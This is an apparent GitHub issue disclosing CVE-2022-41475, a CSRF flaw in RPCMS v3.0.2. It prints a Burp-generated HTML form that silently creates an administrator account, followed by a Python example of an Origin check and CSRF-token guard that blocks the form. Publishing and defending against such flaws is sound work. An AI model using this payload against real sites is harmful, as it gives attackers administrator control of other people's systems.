CVE-2022-41475: There is a CSRF vulnerability that can add an administrator account · Issue #2 · ralap-z/rpcms

RPCMS v3.0.2 was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily add an administrator account.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/admin/user/doAdd.html" method="POST">
      <input type="hidden" name="username" value="guest" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="nickname" value="guest" />
      <input type="hidden" name="role" value="admin" />
      <input type="hidden" name="status" value="0" />
      <input type="hidden" name="isCheck" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
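The PoC above works because the doAdd handler accepts any POST carrying these six fields, regardless of where the form was loaded from. As an added example (not code from RPCMS or from the issue), here is a server-side guard in Python that would stop it: it requires the request's Origin/Referer to match the site and requires a session-bound synchronizer token that a cross-site page cannot read. The `_csrf` field name, `DEMO_SECRET` and the session ids are hypothetical; the form body is constructed from the PoC's fields.

```python
import hmac
import hashlib
from urllib.parse import parse_qs, urlsplit, urlencode

# Constructed sample: the exact field set the PoC form submits.
POC_FIELDS = {"username": "guest", "password": "123456", "nickname": "guest",
              "role": "admin", "status": "0", "isCheck": "0"}
POC_BODY = urlencode(POC_FIELDS)
SITE_ORIGIN = "http://127.0.0.1"          # origin of the form action in the PoC
DEMO_SECRET = b"constructed-demo-secret"  # hypothetical server-side secret


def issue_csrf_token(session_id: str, secret: bytes = DEMO_SECRET) -> str:
    # Synchronizer token bound to the session; the legitimate admin form embeds it.
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def is_same_origin(value: str) -> bool:
    # Accepts either a bare Origin ("http://host") or a full Referer URL.
    p = urlsplit(value)
    return f"{p.scheme}://{p.netloc}" == SITE_ORIGIN


def check_admin_request(method, headers, body, session_id, secret=DEMO_SECRET):
    """Decide whether /admin/user/doAdd.html may act on this request.

    Returns (allowed, reason). Two independent checks: the request must come
    from this site, and it must carry the token tied to the caller's session.
    """
    if method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method"
    source = headers.get("Origin") or headers.get("Referer")
    if not source or not is_same_origin(source):
        return False, "cross-site or missing Origin/Referer"
    fields = parse_qs(body)
    token = fields.get("_csrf", [""])[0]
    if not hmac.compare_digest(token, issue_csrf_token(session_id, secret)):
        return False, "missing or invalid CSRF token"
    if fields.get("role", [""])[0] == "admin":
        # Allowed, but creation of a privileged account deserves an audit entry.
        return True, "ok (audit: admin role requested)"
    return True, "ok"


if __name__ == "__main__":
    # The PoC replayed: a browser on the attacker's page sends a foreign Origin.
    print(check_admin_request("POST", {"Origin": "http://attacker.example"}, POC_BODY, "s1"))
```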
